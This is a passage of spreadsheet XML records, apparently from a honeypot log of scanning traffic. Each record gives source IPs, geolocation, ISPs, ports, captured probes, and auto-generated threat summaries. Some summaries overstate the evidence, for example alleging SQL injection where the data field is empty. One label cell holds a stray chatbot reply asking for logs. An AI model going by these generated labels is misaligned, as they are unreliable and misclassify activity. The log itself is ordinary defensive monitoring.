    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_IMAP_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;443&amp;&amp;80&amp;&amp;5432&amp;&amp;3306&amp;&amp;25&amp;&amp;445&amp;&amp;9100&amp;&amp;1433&amp;&amp;110&amp;&amp;143&amp;&amp;21&amp;&amp;56914"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;login&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.209.6:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.113.33:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.42.176:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.135,40182)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (kUiZsemJ,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.135;rport=52290'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.63.23:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.135;rport=50489'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.135,45048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (hrjajVWJ,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.8.76:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d87"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The system is unable to establish a POP3 connection, possibly indicating an attempted brute-force login or port scanning activity from an external source. The lack of data suggests the connection was not successful. This may be a sign of reconnaissance by malicious actors. &amp;&amp; Attempted SQL injection or database query exploitation possibly via a POST request to a Postgres service. This could be a reconnaissance attempt or an attack in progress targeting a potentially vulnerable database. Possible malicious actor probing for exploitable vulnerabilities. &amp;&amp; Unknown host is making a GET request to retrieve version information, potentially trying to identify vulnerabilities in the service. This could be a reconnaissance or probing activity by an attacker. The '*' in the Accept header suggests no specific data type is expected. &amp;&amp; A GET request is being sent to retrieve version information, potentially for reconnaissance or exploitation purposes. This could be an initial step in a larger attack or vulnerability scan. It may indicate an attempt to gather information about the target system. &amp;&amp; A request was made to access the root directory of a web server with an unknown host, potentially indicating a scanning or reconnaissance activity. The '*' in 'Accept' suggests a non-specific request, possibly attempting to discover vulnerabilities. This could be the first step in a larger attack. &amp;&amp; An unknown client attempted a GET request to the root URI of a server, possibly for reconnaissance or exploitation purposes. This activity may indicate an attacker probing system vulnerabilities or gathering information about the server's configuration. The Accept header being set to '*' suggests no specific data format is requested, which could be indicative of a broad-scanning approach."/>
    <s v="Port Scan &amp;&amp; Port Scan &amp;&amp; HTTP Scan &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="215"/>
    <x v="215"/>
    <s v="125-229-5-154.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T09:10:56"/>
    <d v="2025-02-26T03:01:21"/>
    <d v="2025-04-30T09:10:56"/>
    <n v="256"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23&amp;&amp;38686&amp;&amp;38701&amp;&amp;50545&amp;&amp;38657&amp;&amp;38721&amp;&amp;38744&amp;&amp;38763&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:59a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log indicates an attempt to connect via telnet without specifying any target service, suggesting a scanning activity trying to identify available services._x000a_The user or script seems to be probing for vulnerabilities by sending connection requests._x000a_No malicious action was taken as no service is specified."/>
    <s v="Brute Scan"/>
  </r>
  <r>
    <x v="216"/>
    <x v="216"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T09:10:49"/>
    <d v="2025-04-03T14:44:46"/>
    <d v="2025-04-30T09:10:49"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IL"/>
    <s v="Israel"/>
    <s v="M"/>
    <s v="Central District"/>
    <s v="Nefat Ramla"/>
    <s v="Lod"/>
    <s v="294421"/>
    <s v="NA"/>
    <s v="31.954"/>
    <s v="34.8905"/>
    <s v="47956"/>
    <s v="XFone 018 Ltd"/>
    <s v="Xfone Communication LTD"/>
    <s v="business"/>
    <s v="Xfone Communication LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:566:fe70"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="217"/>
    <x v="217"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:55:58"/>
    <d v="2025-04-30T08:55:58"/>
    <d v="2025-04-30T08:55:58"/>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d6:2928"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="218"/>
    <x v="218"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:52:25"/>
    <d v="2024-07-17T02:33:21"/>
    <d v="2025-04-30T08:52:25"/>
    <n v="77"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;80&amp;&amp;NA&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Sheung Wan"/>
    <s v="1818833"/>
    <s v="NA"/>
    <s v="22.2868"/>
    <s v="114.152"/>
    <s v="152194"/>
    <s v="CTG Server Limited"/>
    <s v="CTG Server Ltd."/>
    <s v="hosting"/>
    <s v="Rackip Consultancy Pte. LTD"/>
    <s v="2007-09-06"/>
    <s v="CTG107-40-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,55976)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,56299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,51383)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,51464)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:766b:2a2c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="219"/>
    <x v="219"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:38:47"/>
    <d v="2025-02-07T13:16:31"/>
    <d v="2025-04-30T08:38:47"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="B"/>
    <s v="Buenos Aires"/>
    <s v="Partido de General San Martín"/>
    <s v="Ciudad del Libertador General San Martín"/>
    <s v="3433779"/>
    <s v="NA"/>
    <s v="-34.5779"/>
    <s v="-58.5386"/>
    <s v="7303"/>
    <s v="Telecom Argentina S.A."/>
    <s v="Telecom Argentina S.A"/>
    <s v="residential"/>
    <s v="Fibertel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:423c:1d52"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze or describe any malicious activity. &amp;&amp; There is insufficient information to analyze potential malicious activity as there is no log data provided."/>
    <s v="I'll need some log data to analyze. Please provide it, and I'll give you the types of attacks with a short phrase for each one."/>
  </r>
  <r>
    <x v="220"/>
    <x v="220"/>
    <s v="adsl-146-32.romerikebb.no"/>
    <x v="0"/>
    <d v="2025-04-30T08:31:57"/>
    <d v="2025-04-28T17:16:43"/>
    <d v="2025-04-30T08:31:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="NA"/>
    <s v="Akershus"/>
    <s v="Aurskog-Høland"/>
    <s v="Bjørkelangen"/>
    <s v="3161346"/>
    <s v="NA"/>
    <s v="59.8836"/>
    <s v="11.564"/>
    <s v="43568"/>
    <s v="VEV Romerike AS"/>
    <s v="RBB DSL"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-06-05"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2004-09-22 00:00:00"/>
    <s v="NA"/>
    <s v="2024-08-26 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4df7:9220"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The log shows an attempt to connect to a TELNET service, which may be a scanning or probing activity by malicious actors, trying to exploit vulnerabilities in the system. This could be part of a larger reconnaissance effort. No TELNET connections were established however. &amp;&amp; No TELNET activity detected, but this could indicate an attacker attempting to access a service that is not enabled or is being monitored for potential malicious activity. This could be a probing attempt or a failed login attempt. It might also suggest that the system is secure and no one has tried to log in via TELNET."/>
    <m/>
  </r>
  <r>
    <x v="221"/>
    <x v="221"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:19:16"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T08:19:16"/>
    <n v="79"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Coimbatore (Balaji Nagar)"/>
    <s v="1273865"/>
    <s v="641018"/>
    <s v="11.0223"/>
    <s v="76.9797"/>
    <s v="45284"/>
    <s v="Wireline Solution India Pvt Ltd."/>
    <s v="WLSNET"/>
    <s v="cellular"/>
    <s v="Wireless Solution India Pvt Ltd."/>
    <s v="2010-10-21"/>
    <s v="WLSNET-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52052)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52089)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52556)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,54708)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55022)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,61568)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,61676)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62053)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55927)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52380)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52404)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,52810)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55749)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55754)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,56086)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,59454)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,59468)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,59785)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62975)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,63016)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,63866)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,53649)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,53662)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55906)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,55944)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62715)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,62737)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,49761)}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.174,49767)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79c8:35ae"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A suspicious incoming SMB connection attempt from IP address 121.200.53.174, possibly indicating a brute-force or unauthorized access attempt to shared files or resources on the monitored system. This could be an initial step in a larger malicious activity, such as data exfiltration or ransomware deployment. &amp;&amp; An incoming SMB connection from a suspicious IP address 121.200.53.174 to an unknown port 49767 suggests a potential malicious attempt to access and exploit vulnerabilities on the monitored system._x000a_This could be a reconnaissance phase of a larger attack or an attempt to spread malware through shared resources._x000a_The unusual port may indicate an attempt to bypass usual security controls. &amp;&amp; A user has authenticated to a service using basic credentials, potentially indicating unauthorized access to internal resources. This could be an attempted or successful intrusion by an attacker trying to gain elevated privileges. The use of basic authentication suggests the attacker may have been unable to authenticate using more secure methods. &amp;&amp; Malicious user has accessed a shared resource on the network, likely for unauthorized access or data exfiltration. The use of basic authentication suggests an attempt to exploit weak security measures. Authentication was successful, indicating potential exploitation of vulnerabilities or stolen credentials. &amp;&amp; Unauthorized user has been granted access to share using basic authentication credentials, potentially enabling malicious activity within the network. This could be a sign of an attacker attempting to escalate privileges or gain unauthorized access. Further monitoring is necessary to determine extent of breach. &amp;&amp; An attacker has attempted to authenticate using basic authentication on a shared network service, indicating possible brute force or unauthorized access attempts. This may be a precursor to further malicious activity such as file exfiltration or system compromise. The user account was able to bypass initial security checks."/>
    <s v="SMB Attack &amp;&amp; SMB Portscan &amp;&amp; SMB Breach &amp;&amp; SMB Auth Bypass &amp;&amp; SMB Auth &amp;&amp; SMB Auth"/>
  </r>
  <r>
    <x v="222"/>
    <x v="222"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:18:10"/>
    <d v="2025-04-30T00:39:52"/>
    <d v="2025-04-30T08:18:10"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:6c68"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="223"/>
    <x v="223"/>
    <s v="fb02itsscan02.fh-muenster.de&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T08:11:00"/>
    <d v="2023-07-24T16:14:25"/>
    <d v="2025-04-30T08:11:00"/>
    <n v="3143"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
